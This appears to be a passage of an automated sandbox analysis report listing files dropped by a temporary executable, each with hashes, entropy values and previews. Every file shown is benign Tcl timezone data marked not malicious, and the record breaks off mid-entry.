                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Boise) {. {-9223372036854775808 -27889 0 LMT}. {-2717640000 -28800 0 PST}. {-1633269600 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-1601820000 -25200 1 PDT}. {-1583679600 -28800 0 PST}. {-1471788000 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126255600 -25200 0 MST}. {129114000 -21600 0 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {2307
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):234
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.775296176809929
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7/MQA+zJFVAIgp/MQA+z2L290BFzk5h490/MQA+zq:MBaIMY/MV+z6p/MV+z2L290rzy490/Mz
                                                                                                                                                                                                                                                                                                                                MD5:861DAA3C2FFF1D3E9F81FB5C63EA71F1
                                                                                                                                                                                                                                                                                                                                SHA1:8E219E63E6D7E702FD0644543E05778CE786601A
                                                                                                                                                                                                                                                                                                                                SHA-256:1D32F22CF50C7586CB566E45988CA05538E61A05DF09FD8F824D870717832307
                                                                                                                                                                                                                                                                                                                                SHA-512:71B47C369DF1958C560E71B114616B999FB4B091FAA6DD203B29D2555FFE419D6FC5EF82FA810DC56E6F00722E13B03BFBED2516B4C5C2321F21E03F0198B91B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Buenos_Aires)]} {. LoadTimeZoneFile America/Argentina/Buenos_Aires.}.set TZData(:America/Buenos_Aires) $TZData(:America/Argentina/Buenos_Aires).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7487
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.787618233072156
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:OGoGm+4ILQzXN+C2mWBNQMsmNTxf6AeO+cblX:P7YUC2mWBNwWTxyWR
                                                                                                                                                                                                                                                                                                                                MD5:839C797E403B4C102D466B1E759A6CC4
                                                                                                                                                                                                                                                                                                                                SHA1:D95864FF269AD16B35CDAAC95AE03D8306B8DE1F
                                                                                                                                                                                                                                                                                                                                SHA-256:37E219C4C7AEBCC8919293114280A247E8072F2760E69F083E9FDD6BE460B9BC
                                                                                                                                                                                                                                                                                                                                SHA-512:A74F3B3C83815F62F6BDF4199EA471872AE539D6C0C595BA41E6D2DF033075D74CC00995C8F99C3ADD4B1E5E04A12D663BE9BED4CE600FC5F067D7CDDED4D7F5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cambridge_Bay) {. {-9223372036854775808 0 0 -00}. {-1577923200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-147891600 -18000 1 MDDT}. {-131562000 -25200 0 MST}. {325674000 -21600 1 MDT}. {341395200 -25200 0 MST}. {357123600 -21600 1 MDT}. {372844800 -25200 0 MST}. {388573200 -21600 1 MDT}. {404899200 -25200 0 MST}. {420022800 -21600 1 MDT}. {436348800 -25200 0 MST}. {452077200 -21600 1 MDT}. {467798400 -25200 0 MST}. {483526800 -21600 1 MDT}. {499248000 -25200 0 MST}. {514976400 -21600 1 MDT}. {530697600 -25200 0 MST}. {544611600 -21600 1 MDT}. {562147200 -25200 0 MST}. {576061200 -21600 1 MDT}. {594201600 -25200 0 MST}. {607510800 -21600 1 MDT}. {625651200 -25200 0 MST}. {638960400 -21600 1 MDT}. {657100800 -25200 0 MST}. {671014800 -21600 1 MDT}. {688550400 -25200 0 MST}. {
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7652
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4267759764212906
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:ylD7ZYOtu7D/fVLF5H1RuSFuY66DCM/rDAWicDqRp5RepgK3i8kmmkniko1Kg+R7:n4jF17vArp
                                                                                                                                                                                                                                                                                                                                MD5:87CB052D17717B696F3D9158B237E4FB
                                                                                                                                                                                                                                                                                                                                SHA1:79B3947A50ED15C908CFC2D699D2B7F11468E7B2
                                                                                                                                                                                                                                                                                                                                SHA-256:113E8ADCECE14A96261A59E0C26073EA5CFF864C4FF2DA6FAB5C61129A549043
                                                                                                                                                                                                                                                                                                                                SHA-512:2BF788FD51E7268A1989F1C564E7B81B002B876381AEC561564D4BCE8D76C9D3F621A2F1AB26C1EAB5E5C64A3C41A536A1E21A5322D678CB11CB608333515144
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Campo_Grande) {. {-9223372036854775808 -13108 0 LMT}. {-1767212492 -14400 0 -04}. {-1206954000 -10800 1 -04}. {-1191358800 -14400 0 -04}. {-1175371200 -10800 1 -04}. {-1159822800 -14400 0 -04}. {-633816000 -10800 1 -04}. {-622065600 -14400 0 -04}. {-602280000 -10800 1 -04}. {-591829200 -14400 0 -04}. {-570744000 -10800 1 -04}. {-560206800 -14400 0 -04}. {-539121600 -10800 1 -04}. {-531349200 -14400 0 -04}. {-191361600 -10800 1 -04}. {-184194000 -14400 0 -04}. {-155160000 -10800 1 -04}. {-150066000 -14400 0 -04}. {-128894400 -10800 1 -04}. {-121122000 -14400 0 -04}. {-99950400 -10800 1 -04}. {-89586000 -14400 0 -04}. {-68414400 -10800 1 -04}. {-57963600 -14400 0 -04}. {499752000 -10800 1 -04}. {511239600 -14400 0 -04}. {530596800 -10800 1 -04}. {540270000 -14400 0 -04}. {562132800 -10800 1 -04}. {571201200 -14400 0 -04}. {592977600
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1365
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9551252054637245
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQseeRb/uyV3XVP/upG/u/yRXiSn/Q8Sn/mfSn/yISn/PSn/zI3Sn/RSn/lfSn/A:5i7XEaRyM/BM/mfM/1M/PM/zmM/RM/l/
                                                                                                                                                                                                                                                                                                                                MD5:2EC91D30699B64FA8199004F97C63645
                                                                                                                                                                                                                                                                                                                                SHA1:4C4E00857B1FB3970E7C16C4EFAA9347ED2C3629
                                                                                                                                                                                                                                                                                                                                SHA-256:4EB4C729FF11E170D683310422D8F10BCE78992CF13DACCB06662308C76CCA3B
                                                                                                                                                                                                                                                                                                                                SHA-512:D7811C32E4D2B3B9FAEE730D580BC813EC41B63765DE34BB3A30A0D9BBEF2F090E2DA59C6D9A4D8FC91885DDEA2B6E3B1FD3FD434E42D805AF66E578E66AE6FE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cancun) {. {-9223372036854775808 -20824 0 LMT}. {-1514743200 -21600 0 CST}. {377935200 -18000 0 EST}. {828860400 -14400 1 EDT}. {846396000 -18000 0 EST}. {860310000 -14400 1 EDT}. {877845600 -18000 0 EST}. {891759600 -14400 1 EDT}. {902041200 -18000 0 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 CDT}. {1225004400 -21600 0 CST}. {1238918400 -18000 1 CD
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):274
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.527582804527589
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52909+ET2m2OHXP8Hk4lvFVFQVgIUF/R/OGWnVVFQVg2vR/O9:MBp5290QmdHXPy/ltvAYFZ/OGqVvA9/K
                                                                                                                                                                                                                                                                                                                                MD5:D47486658B408AAF7F91569435B49D19
                                                                                                                                                                                                                                                                                                                                SHA1:C69EDC17F2E77723A5C711342822BF21ECCB9C8E
                                                                                                                                                                                                                                                                                                                                SHA-256:555A66624909220ACCCB35D852079D44944E188A81DF6A07CBA7433AC2478E5E
                                                                                                                                                                                                                                                                                                                                SHA-512:35A4AF702405BD36F6EF7E42F1E1AEAD841A5710D04306C1C3390B3CC134E88F1221F284F489F6926C58E8FD50BD7E6BE0E5904AAE2ACBEA817EFCE0AAE61169
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Caracas) {. {-9223372036854775808 -16064 0 LMT}. {-2524505536 -16060 0 CMT}. {-1826739140 -16200 0 -0430}. {-157750200 -14400 0 -04}. {1197183600 -16200 0 -0430}. {1462086000 -14400 0 -04}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):222
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.615632762186706
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7/MMXAIVAIgp/MMXs29094SXAFB5290/MMXAv:MBaIMY/Mhp/MP290mh5290/MH
                                                                                                                                                                                                                                                                                                                                MD5:359226FA8A7EAFCA0851F658B4EBBCDC
                                                                                                                                                                                                                                                                                                                                SHA1:611A24C24462DF5994B5D043E65770B778A6443B
                                                                                                                                                                                                                                                                                                                                SHA-256:F2782781F1FB7FD12FF85D36BB244887D1C2AD52746456B3C3FEAC2A63EC2157
                                                                                                                                                                                                                                                                                                                                SHA-512:6F9DD2D1662103EC5A34A8858BDFA69AC9F74D3337052AB47EA61DC4D76216886A0644CF1284940E8862A09CBA3E0A87784DFDB6414434C92E45004AAF312614
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Catamarca)]} {. LoadTimeZoneFile America/Argentina/Catamarca.}.set TZData(:America/Catamarca) $TZData(:America/Argentina/Catamarca).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):178
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.781235086647991
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52IAcGE91pkXGm2OHEFvpoevUdR4FIUPvGDUwXvp3VVFVGHC:SlSWB9X52909zm2OHEdGeG4vOIw/ZVVF
                                                                                                                                                                                                                                                                                                                                MD5:1FFD7817EE1DC55EF72AD686749AE9CE
                                                                                                                                                                                                                                                                                                                                SHA1:AE972D5395F3562F052780AD014BA2C0767943B6
                                                                                                                                                                                                                                                                                                                                SHA-256:9CE77C0A01BFDA002EE3B2DCEF316DB7C9AC80B270DFC3A0D7769021E731D849
                                                                                                                                                                                                                                                                                                                                SHA-512:480D8D56F7B8829F6E82D8AFF1A0A161C3C45402D85A588027E98F2FA20C6E6F35549FFC5F38F0EEA9C4190A70B334066FCD406D39FF06EE7B7855AF75CD0FC3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cayenne) {. {-9223372036854775808 -12560 0 LMT}. {-1846269040 -14400 0 -04}. {-71092800 -10800 0 -03}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):180
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.723325073771884
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0u55DdVAIg20u5AF2IAcGE91mr4IAcGEu5un:SlSWB9IZaM3y7oDdVAIgpX2909Yr490/
                                                                                                                                                                                                                                                                                                                                MD5:E03755B574F4962030DB1E21D1317963
                                                                                                                                                                                                                                                                                                                                SHA1:5B5FA4787DA7AE358EFEA81787EB2AB48E4D7247
                                                                                                                                                                                                                                                                                                                                SHA-256:8E85F05135DB89CB304689081B22535002DBD184D5DCDBF6487CD0A2FBE4621E
                                                                                                                                                                                                                                                                                                                                SHA-512:8B85E51BD8DC04AE768A4D42F8DF0E0D60F23FAB2607E3DCAD4E10695E50C2A3F2124DA7E3A87E97DB7AF090EF70C9A5B5C2D34F7D1B6F74FEFEA9148FEB15AB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Panama)]} {. LoadTimeZoneFile America/Panama.}.set TZData(:America/Cayman) $TZData(:America/Panama).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):11003
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.728817385585057
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:rXxbWziyUZB4ME9Hmp7EYQYMWUJ2eQzURWu3OabMQxXI6X8x3X3D2DgOMIOdXkqq:rXxbWziyUZB4ME9Hmp7EYQYMWUJ2eQzg
                                                                                                                                                                                                                                                                                                                                MD5:6175956F3052F3BE172F6110EF6342EE
                                                                                                                                                                                                                                                                                                                                SHA1:532E2600DFAFAACCD3A187A233956462383401A6
                                                                                                                                                                                                                                                                                                                                SHA-256:FC172494A4943F8D1C3FC35362D96F3D12D6D352984B93BC1DE7BDCB7C85F15E
                                                                                                                                                                                                                                                                                                                                SHA-512:36B47003183EB9D7886F9980538DB3BDDC231BB27D4F14006CDBE0CB9042215A02559D97085679F8320DED6109FC7745DC43859EBA99B87365B09C4526D28193
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Chicago) {. {-9223372036854775808 -21036 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-1577901600 -21600 0 CST}. {-1563724800 -18000 1 CDT}. {-1551632400 -21600 0 CST}. {-1538928000 -18000 1 CDT}. {-1520182800 -21600 0 CST}. {-1504454400 -18000 1 CDT}. {-1491757200 -21600 0 CST}. {-1473004800 -18000 1 CDT}. {-1459702800 -21600 0 CST}. {-1441555200 -18000 1 CDT}. {-1428253200 -21600 0 CST}. {-1410105600 -18000 1 CDT}. {-1396803600 -21600 0 CST}. {-1378656000 -18000 1 CDT}. {-1365354000 -21600 0 CST}. {-1347206400 -18000 1 CDT}. {-1333904400 -21600 0 CST}. {-1315152000 -18000 1 CDT}. {-1301850000 -21600 0 CST}. {-1283702400 -18000 1 CDT}. {-1270400400 -21600 0 CST}. {-1252252800 -18000 1 CDT}. {-1238950800 -21600 0 CST}. {-1220803200
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6593
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.795313170000037
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:LJNfzBT8tRkfKxhzY720zaOXmlITHjLc1cb:dN18tRkfKv+2wB9h
                                                                                                                                                                                                                                                                                                                                MD5:B0CA4CFF6571AFBFF25FAC72CDDB5B08
                                                                                                                                                                                                                                                                                                                                SHA1:1BF3ACEC369AEA504AAA248459A115E61CF79C4B
                                                                                                                                                                                                                                                                                                                                SHA-256:C689A3BEED80D26EAB96C95C85874428F80699F7E136A44377776E52B5855D00
                                                                                                                                                                                                                                                                                                                                SHA-512:398496EBA4344EDF78AFBF51BD6024481D3A12546D0EE597B7C593A1CD1BF575AFDE62FFADE7A0DDFEDA79CF235612E6F4DA74D7305A6E48F5942EA10D8A4F8E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Chihuahua) {. {-9223372036854775808 -25460 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {820476000 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {883634400 -21600 0 CST}. {891766800 -21600 0 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -21600 1 MDT}. {1162108800 -25
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):193
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.822360211437507
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7/qlfSwFVAIgp/qlfAvt2909qEac90/qlfu:MBaIMY/TwQp/tvt290Fac90/j
                                                                                                                                                                                                                                                                                                                                MD5:2541EC94D1EA371AB1361118EEC98CC6
                                                                                                                                                                                                                                                                                                                                SHA1:950E460C1BB680B591BA3ADA0CAA73EF07C229FE
                                                                                                                                                                                                                                                                                                                                SHA-256:50E6EE06C0218FF19D5679D539983CEB2349E5D25F67FD05E142921431DC63D6
                                                                                                                                                                                                                                                                                                                                SHA-512:2E6B66815565A9422015CAB8E972314055DC4141B5C21B302ABD671F30D0FBAE1A206F3474409826B65C30EDBEDD46E92A99251AB6316D59B09FC5A8095E7562
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Atikokan)]} {. LoadTimeZoneFile America/Atikokan.}.set TZData(:America/Coral_Harbour) $TZData(:America/Atikokan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):214
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.74004515366486
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7/MdVAIgp/MOF29093+90/Msn:MBaIMY/M4p/MOF290c90/Ms
                                                                                                                                                                                                                                                                                                                                MD5:89870B2001C2EE737755A692E7CA2F18
                                                                                                                                                                                                                                                                                                                                SHA1:F67F6C22BF681C105068BEEB494A59B3809C5ED8
                                                                                                                                                                                                                                                                                                                                SHA-256:38C3DD7DAF75DBF0179DBFC387CE7E64678232497AF0DACF35DC76050E9424F7
                                                                                                                                                                                                                                                                                                                                SHA-512:EFA8A5A90BE6FAAA7C6F5F39CBBBA3C7D44C7943E1BB1B0F7E966FEE4F00F0E4BF1D999A377D4E5230271B120B059EB020BD93E7DA46CF1FFA54AB13D7EC3FFE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Cordoba)]} {. LoadTimeZoneFile America/Argentina/Cordoba.}.set TZData(:America/Cordoba) $TZData(:America/Argentina/Cordoba).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):416
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.443696146912203
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp5290l0TmdHd5PZ6kibvI8/uFn/mSU/uFn/i/uFn/4Y8/uFn//DVn:cQmAed9Z6n5Sn/mtSn/iSn/4JSn/bh
                                                                                                                                                                                                                                                                                                                                MD5:D47A1FBA5AD701E1CA168A356D0DA0A9
                                                                                                                                                                                                                                                                                                                                SHA1:6738EA6B4F54CC76B9723917AA373034F6865AF1
                                                                                                                                                                                                                                                                                                                                SHA-256:51F08C1671F07D21D69E2B7868AA5B9BDBFA6C31D57EB84EB5FF37A06002C5CD
                                                                                                                                                                                                                                                                                                                                SHA-512:DB6AD81466500F22820941DF3369155BA03CFA42FA9D267984A28A6D15F88E1A71625E3DC578370B5F97727355EBB7C338482FA33A7701ADB85A160C09BAD232
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Costa_Rica) {. {-9223372036854775808 -20173 0 LMT}. {-2524501427 -20173 0 SJMT}. {-1545071027 -21600 0 CST}. {288770400 -18000 1 CDT}. {297234000 -21600 0 CST}. {320220000 -18000 1 CDT}. {328683600 -21600 0 CST}. {664264800 -18000 1 CDT}. {678344400 -21600 0 CST}. {695714400 -18000 1 CDT}. {700635600 -21600 0 CST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):211
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.798554218839104
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52909ovTm2OHpcHvvPagcyEXC/vHcQCi:MBp52900mdHpcHPagPECvHl
                                                                                                                                                                                                                                                                                                                                MD5:9E3726148A53940507998FA1A5EEE6DB
                                                                                                                                                                                                                                                                                                                                SHA1:2493B72DF895ED2AE91D09D43BDDADDB41E4DEBC
                                                                                                                                                                                                                                                                                                                                SHA-256:E809F227E92542C6FB4BAC82E6079661EEF7700964079AA4D7E289B5B400EC49
                                                                                                                                                                                                                                                                                                                                SHA-512:F5ED4085160A06DE672DB93CEE700C420D0438DE9AC3548B291DA236AA8CCC84F97270DA3956E49432AE1E281CCECEB6DF92E71EB305106655B4DF231E04B558
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Creston) {. {-9223372036854775808 -27964 0 LMT}. {-2713882436 -25200 0 MST}. {-1680454800 -28800 0 PST}. {-1627833600 -25200 0 MST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7646
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4194836403778353
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:+lD7ZYOtu7D/fVLF5H1RuSFuY66DCVDAWicDqRp5RepgK3i8kmmkniko1Kg+R4hu:3jF17vArp
                                                                                                                                                                                                                                                                                                                                MD5:7309EBE8210C3C84C24D459289484EFA
                                                                                                                                                                                                                                                                                                                                SHA1:31EFE19E3CA2DB512C7AC9CAFD72991EF0517FD3
                                                                                                                                                                                                                                                                                                                                SHA-256:FE7543FF576D7EDC3A3FF82759E5C244DE8EB57A95744E20610CEDF6E29AB4C9
                                                                                                                                                                                                                                                                                                                                SHA-512:41C94E4093F015B61ACEFCEA067C101AA1ECB855789CFDB8FA4D17589D20868FB7A1456D21C90B5261445D970E5E7F134CBAF17EA926278C9E6DFC471D29F896
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cuiaba) {. {-9223372036854775808 -13460 0 LMT}. {-1767212140 -14400 0 -04}. {-1206954000 -10800 1 -04}. {-1191358800 -14400 0 -04}. {-1175371200 -10800 1 -04}. {-1159822800 -14400 0 -04}. {-633816000 -10800 1 -04}. {-622065600 -14400 0 -04}. {-602280000 -10800 1 -04}. {-591829200 -14400 0 -04}. {-570744000 -10800 1 -04}. {-560206800 -14400 0 -04}. {-539121600 -10800 1 -04}. {-531349200 -14400 0 -04}. {-191361600 -10800 1 -04}. {-184194000 -14400 0 -04}. {-155160000 -10800 1 -04}. {-150066000 -14400 0 -04}. {-128894400 -10800 1 -04}. {-121122000 -14400 0 -04}. {-99950400 -10800 1 -04}. {-89586000 -14400 0 -04}. {-68414400 -10800 1 -04}. {-57963600 -14400 0 -04}. {499752000 -10800 1 -04}. {511239600 -14400 0 -04}. {530596800 -10800 1 -04}. {540270000 -14400 0 -04}. {562132800 -10800 1 -04}. {571201200 -14400 0 -04}. {592977600 -1080
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):181
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.858195118945703
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52IAcGE9CvjEwcXGm2OHCevUd5xF9vFVFIVgYd/iQG3VFpRR/r:SlSWB9X52909C4wTm2OHjyxzFQVgIUFp
                                                                                                                                                                                                                                                                                                                                MD5:CE0F18F27502E771B27236C5BF7D3317
                                                                                                                                                                                                                                                                                                                                SHA1:D2E68415B8544A8BAC2A4F335854FC048BD4B34C
                                                                                                                                                                                                                                                                                                                                SHA-256:118EC9D89937FDA05FCE45F694F8C3841664BBE9DFADB86347B375BF437F9BD6
